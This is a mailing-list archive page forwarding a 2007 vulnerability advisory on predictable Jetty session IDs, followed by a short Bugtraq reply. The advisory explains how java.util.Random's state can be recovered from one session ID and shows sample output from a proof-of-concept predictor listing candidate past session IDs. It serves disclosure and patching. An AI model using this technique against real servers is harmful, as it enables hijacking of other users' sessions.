ПРОЕКТЫ 


  АРХИВ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  СТАТЬИ 


  ПЕРСОНАЛЬНОЕ 


  ПРОГРАММЫ 



ПИШИТЕ
ПИСЬМА














     АРХИВ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [NEWS] Jetty Session ID Prediction Vulnerability



NGS помимо описания уязвимости конкретного Jetty написала общую статью про 
небезопасность стандартных PRNG 
-http://www.ngssoftware.com/research/papers/Randomness.pdf



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Wednesday, February 07, 2007 11:57 AM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NEWS] Jetty Session ID Prediction Vulnerability
> 
> - - - - - - - - -
> 
> 
> 
> Jetty Session ID Prediction Vulnerability 
> 
> 
> 
> Different versions of Jetty, the popular java web server, are 
> vulnerable to a session id prediction attack. 
> 
> 
> Vulnerable Systems: 
>  * Jetty versions prior to 4.2.27, 5.1.12, 6.0.2 and 6.1.0pre3 
> 
> Immune Systems: 
>  * Jetty versions 4.2.27, 5.1.12, 6.0.2 and 6.1.0pre3. 
> 
> Jetty uses java.util.Random to generate session ids. The 
> internal state of this generator can be easily discovered, 
> leading to an attacker being able to hijack existing and 
> future sessions. 
> 
> java.util.random implements a linear congruential generator, 
> of the following form: 
>     synchronized protected int next(int bits) { 
>            seed = (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1); 
>            return (int)(seed >>> (48 - bits)); 
>      } 
> 
> Jetty generates a 64-bit session id by generating two 32-bit 
> numbers in this way, so we end up with an encoded 64-bit 
> integer. By decoding the integer and splitting it into its 
> two component 32-bit integers, we can easily brute-force the 
> generator's internal state. Once the state is discovered, the 
> generator can be run both forwards and backwards, so an 
> attacker can determine previously generated session ids, as 
> well as session ids that have not yet been generated. This 
> allows the attacker to hijack any existing session, and 
> perform any actions that the original user of the session 
> could perform. Obviously the severity of this issue varies 
> from application to application but we believe it warrants at 
> least a "high" risk rating. 
> 
> NGS have developed proof of concept code for this issue that 
> implements a session predictor for this bug. It takes a 
> session id as input and outputs candidates for the next 5 and 
> previous 5 session ids. It is necessary to output 7 candidate 
> session ids for each iteration because Jetty encodes the 
> session id in a number base from 30 to 36 depending on the 
> millisecond in which the session id was generated. The 
> underlying 64-bit integer is the same, just represented in 
> bases 30-36. 
> 
> Here is some example output: 
> H:\jetty_rand\Debug>jetty_rand.exe g4sse9e7fs5ee 
> Radix: 30 
> Found seed: 5346772124980067 
> 
> Session -5: 
> 27s4jsk03074k 
> 1gbb661e0l6mp 
> 11ctqbu24shqo 
> nqqa46cv6ovh 
> h4xlr7d8n98c 
> cg9x29g6vfna 
> 9568uhp0c7yw 
> 
> Session -4: 
> 586o97hbtkkis 
> 3h9o0c9eglm5q 
> 2dpgen12bekgo 
> 1mf3ar81r4e7d 
> 15vq2mdv83nmo 
> t13aedmjm4ts 
> lamwq2jurlzs 
> 
> Session -3: 
> c2kqln033ior 
> 8d98tft18mgj 
> 5u715san1m0b 
> 47rifnwhompl 
> 31pb1t2496ef 
> 27mbqm91n0gc 
> 1mksf8xjn6kr 
> 
> Session -2: 
> h5n7ft13ak1nr 
> biif83e4tlq37 
> 7tj3f6tclak5h 
> 5fpk27ulvu2nu 
> 3s5vpubx7ekc9 
> 2om684eem9iy2 
> 1xf0lar1nqpwx 
> 
> Session -1: 
> 66isdajhm658g 
> 463l7trqe65oo 
> 2rodl8h2bjkb4 
> 1wdl0j3wqr6tj 
> 1d3hc9k0gm9ja 
> y8hj85q65rxq 
> p49erbpgioo4 
> 
> Session 0: 
> g4sse9e7fs5ee 
> as3iaiqcjo82g 
> 7eeb56egthkrm 
> 54w87w5wtpwfk 
> 3kdimj6vemoce 
> 2iybbcyacjqk9 
> 1t9qijf82uk52 
> 
> The issue affects a great many products that are based on 
> Jetty, such as 
> Apache Geronimo: 
> http://geronimo.apache.org/ 
> 
> The latest version (2.0) of Geronimo is not vulnerable to this issue. 
> Version 1.1 and prior are vulnerable however, and this issue 
> can be used to hijack a session to the administrative console. 
> 
> A further 98 projects based on Jetty are listed on the Jetty 
> website at: 
> http://www.mortbay.com/powered.html 
> 
> Fix: 
> This issue was fixed in the source code on the 22nd of 
> November 2006, less than 6 hours after it was reported. The 
> issue is fixed in released versions 4.2.27, 5.1.12, 6.0.2 and 
> 6.1.0pre3. 
> 
> The changes can be viewed here: 
> http://fisheye.codehaus.org/changelog/jetty/?cs=1274 
> 
> 
> Additional Information: 
> The information has been provided by NGSSoftware Insight 
> Security Research <mailto:nisr@xxxxxxxxxxxxxxx> . 
> 
> 
> ==============================================================

И еще



> -----Original Message-----
> From: Michal Zalewski [mailto:lcamtuf@xxxxxxxxxxxx] 
> Sent: Tuesday, February 06, 2007 11:21 AM
> To: Amit Klein
> Cc: NGSSoftware Insight Security Research; bugtraq@xxxxxxxxxxxxxxxxx
> Subject: Re: Jetty Session ID Prediction
> 
> On Tue, 6 Feb 2007, Amit Klein wrote:
> 
> > I don't think that the method described in the paper you referenced
> > above is applicable as-is [...] (only 32 bits out of the 48 
> are known).
> 
> There are attacks published for just about any variant of LCG 
> imaginable,
> including ones with missing MSB/LSB output bits, etc. But I 
> had a chance
> to talk to David Litchfield and Chris Anley off the list, and 
> they do use
> an algorithmic approach, not brute force - that was simply a 
> poor choice
> of words.
> 
> /mz
> 



 




Copyright © Lexa Software, 1996-2009.